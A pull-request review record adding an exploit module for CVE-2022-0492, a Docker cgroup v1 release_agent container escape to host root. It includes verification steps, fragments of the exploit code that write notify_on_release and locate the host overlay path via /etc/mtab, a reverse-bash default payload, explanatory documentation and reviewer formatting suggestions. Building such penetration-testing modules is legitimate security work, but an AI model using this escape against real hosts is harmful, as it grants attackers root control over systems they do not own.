### PR TITLE
Docker cgroup escape (CVE-2022-0492)

### PR DESCRIPTION
**Pull request by h00die**
This PR adds a new module to exploit CVE-2022-0492, a docker escape for root on the host OS.

## Verification

- [ ] Install Docker and start a docker container
- [ ] Start msfconsole
- [ ] Get a shell on the docker image as root. 
- [ ] Do: `use exploit/linux/local/docker_cgroup_escape`
- [ ] Do: `set lhost [ip]`
- [ ] Do: `set session [#]`
- [ ] Do: `run`
- [ ] You should get a root shell on the host OS.

### CODE REVIEW

File: modules/exploits/linux/local/docker_cgroup_escape.rb [hunk 1]
```diff
@@ -0,0 +1,156 @@
...
+
+    print_status("Enabling notify on release for group #{group}")
+    write_file("#{group_full_dir}/notify_on_release", '1')
+
+    print_status('Determining the host OS path for image')
+    # for this, we need the line that starts with overlay, and contains an 'upperdir' parameter, which we want the value of
+    mtab_file = read_file('/etc/mtab')
+    host_path = nil
+    mtab_file.each_line do |line|
+      next unless line.start_with?('overlay') && line.include?('perdir') # upperdir
```
[the remark this answers is not in the document]
Comment (h00die) [reply modules/exploits/linux/local/docker_cgroup_escape.rb:120]: All of the POCs using this technique went with 'perdir'. Maybe they're all copy pasta but I wasn't sure what else could possibly hit, so decided to go with what they had.

File: modules/exploits/linux/local/docker_cgroup_escape.rb [hunk 2]
```diff
@@ -0,0 +1,156 @@
...
+          'Yiqi Sun', # discovery
+          'Kevin Wang', # discovery
+          'T1erno', # POC
+        ],
+        'Platform' => [ 'unix', 'linux' ],
+        'Arch' => ARCH_CMD,
+        'SessionTypes' => ['meterpreter'],
+        'Targets' => [[ 'Auto', {} ]],
+        'DefaultOptions' => {
+          'PAYLOAD' => 'cmd/unix/reverse_bash'
```
[the remark this answers is not in the document]
Comment (h00die) [reply modules/exploits/linux/local/docker_cgroup_escape.rb]: added a binary target, tried with meterp and it worked fine.

File: documentation/modules/exploit/linux/local/docker_cgroup_escape.md [hunk 3]
```diff
@@ -0,0 +1,139 @@
+## Vulnerable Application
+
+This exploit module takes advantage of a Docker image which has either the privileged flag, or SYS_ADMIN Linux capability.
+If the host kernel is vulnerable, its possible to escape the Docker image and achieve root on the host operating system.
+
+A vulnerability was found in the Linux kernel's cgroup_release_agent_write in the kernel/cgroup/cgroup-v1.c function.
```
Comment (cgranleese-r7) [inline documentation/modules/exploit/linux/local/docker_cgroup_escape.md:6]:
```suggestion
A vulnerability was found in the Linux kernel's `cgroup_release_agent_write` in the `kernel/cgroup/cgroup-v1.c` function.
```

File: documentation/modules/exploit/linux/local/docker_cgroup_escape.md [hunk 4]
```diff
@@ -0,0 +1,139 @@
...
+This flaw, under certain circumstances, allows the use of the cgroups v1 release_agent feature to escalate privileges
```
Comment (cgranleese-r7) [inline documentation/modules/exploit/linux/local/docker_cgroup_escape.md:7]:
```suggestion
This flaw, under certain circumstances, allows the use of the cgroups v1 `release_agent` feature to escalate privileges
```

File: documentation/modules/exploit/linux/local/docker_cgroup_escape.md [hunk 5]
```diff
@@ -0,0 +1,139 @@
...
+and bypass the namespace isolation unexpectedly.
+
+More simply put, cgroups v1 has a feature called release_agent that runs a program when a process in the cgroup terminates.
```
Comment (cgranleese-r7) [inline documentation/modules/exploit/linux/local/docker_cgroup_escape.md:10]:
```suggestion
More simply put, cgroups v1 has a feature called `release_agent` that runs a program when a process in the cgroup terminates.
```

File: documentation/modules/exploit/linux/local/docker_cgroup_escape.md [hunk 6]
```diff
@@ -0,0 +1,139 @@
...
+If notify_on_release is enabled, the kernel runs the release_agent binary as root. By editing the release_agent file,
```
Comment (cgranleese-r7) [inline documentation/modules/exploit/linux/local/docker_cgroup_escape.md:11]:
```suggestion
If `notify_on_release` is enabled, the kernel runs the `release_agent` binary as root. By editing the release_agent file,
```

File: documentation/modules/exploit/linux/local/docker_cgroup_escape.md [hunk 7]
```diff
@@ -0,0 +1,139 @@
...
+an attacker can execute their own binary with elevated privileges, taking control of the system. However, the release_agent
```
Comment (cgranleese-r7) [inline documentation/modules/exploit/linux/local/docker_cgroup_escape.md:12]:
```suggestion
an attacker can execute their own binary with elevated privileges, taking control of the system. However, the `release_agent`
```

**Review by cgranleese-r7 — COMMENTED** [review]
Nice module 👍 

Tested this against Ubuntu 18.4 and everything worked as expected. Left a few formatting suggestions for the markdown. Happy to land once everything is resolved.

**Comment by h00die** [comment]
docs updated

**Comment by cgranleese-r7** [comment]
## Release Notes
This PR adds a new module to exploit CVE-2022-0492, a docker escape for root on the host OS.

**Pull request merged**